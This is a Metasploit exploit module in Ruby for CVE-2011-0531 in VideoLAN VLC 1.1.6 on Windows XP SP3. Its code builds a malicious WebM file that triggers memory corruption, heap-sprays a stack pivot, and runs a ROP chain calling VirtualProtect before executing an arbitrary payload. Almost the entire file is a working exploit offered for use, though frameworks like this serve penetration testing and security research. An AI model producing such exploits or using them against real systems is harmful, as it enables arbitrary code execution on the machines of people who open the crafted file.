175 lines
4.7 KiB
Ruby
175 lines
4.7 KiB
Ruby
##
|
|
# $Id$
|
|
##
|
|
|
|
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# Framework web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/framework/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'VideoLAN VLC MKV Memory Corruption',
|
|
'Description' => %q{
|
|
This module exploits an input validation error in VideoLAN VLC
|
|
< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker
|
|
could execute arbitrary code.
|
|
|
|
NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to
|
|
permanently enable NX support on machines that support it.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'Dan Rosenberg' ],
|
|
'Version' => '$Revision$',
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '70698' ],
|
|
[ 'CVE', '2011-0531' ],
|
|
[ 'BID', '46060' ],
|
|
[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],
|
|
[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'DisableNops' => true,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'VLC 1.1.6 on Windows XP SP3',
|
|
{
|
|
'SprayTarget' => 0x030b030a,
|
|
'Ret' => 0x6ce091b5, # Pointer to SprayTarget
|
|
'Base' => 0x6cd00000, # Base of libtaglib_plugin.dll
|
|
}
|
|
],
|
|
],
|
|
'Privileged' => false,
|
|
'DisclosureDate' => 'Jan 31 2011',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.webm']),
|
|
], self.class)
|
|
end
|
|
|
|
def exploit
|
|
|
|
rop_base = target["Base"]
|
|
spray = target["SprayTarget"]
|
|
|
|
# EBML Header
|
|
file = "\x1A\x45\xDF\xA3" # EBML
|
|
file << "\x01\x00\x00\x00"
|
|
file << "\x00\x00\x00\x1F"
|
|
file << "\x42\x86\x81\x01" # EBMLVersion = 1
|
|
file << "\x42\xF7\x81\x01" # EBMLReadVersion = 1
|
|
file << "\x42\xF2\x81\x04" # EBMLMaxIDLength = 4
|
|
file << "\x42\xF3\x81\x08" # EBMLMaxSizeLength = 8
|
|
file << "\x42\x82\x84\x77" # DocType = "webm"
|
|
file << "\x65\x62\x6D"
|
|
file << "\x42\x87\x81\x02" # DocTypeVersion = 2
|
|
file << "\x42\x85\x81\x02" # DocTypeReadVersion = 2
|
|
|
|
# Segment data
|
|
file << "\x18\x53\x80\x67" # (0) Segment
|
|
file << "\x01\x00\x00\x00"
|
|
file << "\x01\xD6\x22\xF1"
|
|
|
|
# Seek data
|
|
file << "\x11\x4D\x9B\x74" # (1) SeekHead
|
|
file << "\x40\x3F"
|
|
|
|
file << "\x4D\xBB\x8B" # (2) Seek
|
|
file << "\x53\xAB\x84" # (3) SeekID = Segment Info
|
|
file << "\x15\x49\xA9\x66" #
|
|
|
|
file << "\x53\xAC\x81" # (3) SeekPosition
|
|
file << "\xff" # index of segment info
|
|
|
|
# Trigger the bug with an out-of-order element
|
|
file << "\x53\xAB\x84" # (3) SeekID = Tracks
|
|
file << "\x16\x54\xAE\x6B" #
|
|
|
|
file << "\x42" * 228 # Padding
|
|
|
|
# Data
|
|
file << "\x15\x49\xA9\x66" # (1) Segment Info
|
|
file << "\x01\x00\x00\x00" #
|
|
file << "\x01\xff\xff\xff" # This triggers our heap spray...
|
|
file << [target.ret].pack('V') # Pointer to our heap spray
|
|
|
|
# The alignment plays nice, so EIP will always
|
|
# hit our pivot when our heapspray works. ESI contains
|
|
# 0x030b030a, which will point to one of our "pop; retn"
|
|
# pointers, so this works as both a pivot and NOPsled
|
|
block = [
|
|
rop_base + 0x229a5, # xcgh esi,esp; retn
|
|
rop_base + 0x2c283, # pop eax; retn
|
|
0xdeadbeef, # pad
|
|
rop_base + 0x2c283, # pop eax; retn
|
|
]
|
|
block = block.pack('V*')
|
|
|
|
# ROP payload
|
|
rop = [
|
|
rop_base + 0x1022, # retn
|
|
|
|
# Call VirtualProtect()
|
|
rop_base + 0x2c283, # pop eax; retn
|
|
rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax
|
|
rop_base + 0x12fda, # mov eax,DWORD PTR [eax]
|
|
rop_base + 0x29d13, # jmp eax
|
|
|
|
rop_base + 0x1022, # retn
|
|
spray & ~0xfff, # lpAddress
|
|
0x60000, # dwSize
|
|
0x40, # flNewProtect
|
|
spray - 0x1000, # lpfOldProtect
|
|
|
|
# Enough of this ROP business...
|
|
rop_base + 0xdace8 # push esp; retn
|
|
]
|
|
rop = rop.pack('V*')
|
|
|
|
# Overwrite the bad pointer with the address of an infinite
|
|
# loop so the other threads spin instead of crashing
|
|
rop << "\xc7\x05"
|
|
rop << [spray + 0xc].pack('V')
|
|
rop << [rop_base + 0x1c070].pack('V') # mov DWORD PTR ds:[ptr],&loop
|
|
|
|
# Restore the stack
|
|
rop << "\x87\xe6" # xchg esi,esp
|
|
|
|
# Payload
|
|
rop << payload.encoded
|
|
|
|
# We need to be 16-byte aligned
|
|
rop << "\xcc" * (16 - rop.length % 16)
|
|
|
|
# Heapspray and payload, go!
|
|
32.times {
|
|
0x3000.times {
|
|
file << block
|
|
}
|
|
file << rop
|
|
}
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
|
|
|
file_create(file)
|
|
|
|
end
|
|
end
|